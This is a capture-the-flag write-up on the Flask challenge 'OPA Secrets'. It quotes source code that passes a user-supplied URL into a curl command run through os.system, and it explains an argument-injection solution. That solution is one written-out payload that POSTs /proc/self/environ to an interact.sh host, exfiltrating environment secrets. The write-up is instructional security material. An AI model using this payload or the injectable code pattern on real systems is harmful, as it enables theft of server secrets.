OPA Secrets

The application source code was provided : https://github.com/congon4tor/opa_secrets

It’s a flask application, the challenge descriptions says: OPA! Check out our new secret management service

After signing up , we can add a secret by clicking on the Create secret button firefox_7rJil9jpkB

There are three more users on the application , which we can find from the app.py file. :

    u = [
            "id": "1822f21a-d720-4494-a31f-943bec140789",
            "username": "congon4tor",
            "role": "admin",
            "password": os.getenv("AMDIN_PASSWORD", "qwerty123"),
            "id": "243eae36-621a-47a6-b306-841bbffbcac4",
            "username": "jellytalk",
            "role": "user",
            "password": "test",
            "id": "9d6492e1-c73d-4231-add7-7ea285fc98a1",
            "username": "pinkykoala",
            "role": "user",
            "password": "test",

The congon4tor user has the flag stored as a secret in his acc.

On the profile settings page, http://challenge.ctf.games:30114/settings it says We will fetch the image from the provided URL .




You can notice the user agent it’s curl, let’s look more into the source code:

@app.route("/updateSettings", methods=["POST"])
def updateSettings():

    url = request.form.get("url")
    if not url:
        return redirect("settings?error=Missing parameters")

    if not session.get("id", None):
        return redirect("/signin?error=Please sign in")
    user_id = session.get("id")
    user = get_user(user_id)
    if not user:
        return redirect("/signin?error=Invalid session")

    if (
        ";" in url
        or "`" in url
        or "$" in url
        or "(" in url
        or "|" in url
        or "&" in url
        or "<" in url
        or ">" in url
        return redirect("settings?error=Invalid character")

    cmd = f"curl --request GET {url} --output ./static/images/{user['id']} --proto =http,https"
    status = os.system(cmd)
    if status != 0:
        return redirect("settings?error=Error fetching the image")

    user["picture"] = user_id

    return redirect("settings?success=Successfully updated the profile picture")

The above code checks for special characters in the url to avoid command injection but not from argument Injection. We can add our own argument to the curl command like change the request method, send post data,etc.

The flag is stored in the env variable.

    s = [
            "id": "afce78a8-23d6-4f07-81f2-47c96ddb10cf",
            "name": "Flag",
            "value": os.getenv("FLAG", "TEST_FLAG"),
            "id": "d2e0704c-55a5-4a63-aad5-849798283da5",
            "name": "Test 1",
            "value": "test secret",
            "id": "491e16d2-fd2b-4965-bcb6-5931ef61ed5b",
            "name": "Test 2",
            "value": "test secret 2",

By adding an arguement like -d @/proc/self/environ this will send the content of the file /proc/self/environ to out controlled server. firefox_HZRIprVDFW

https://x.interact.sh -X POST -d @/proc/self/environ


After the ctf was over found that this was an unintended way, if you try to reproduce the same now it won’t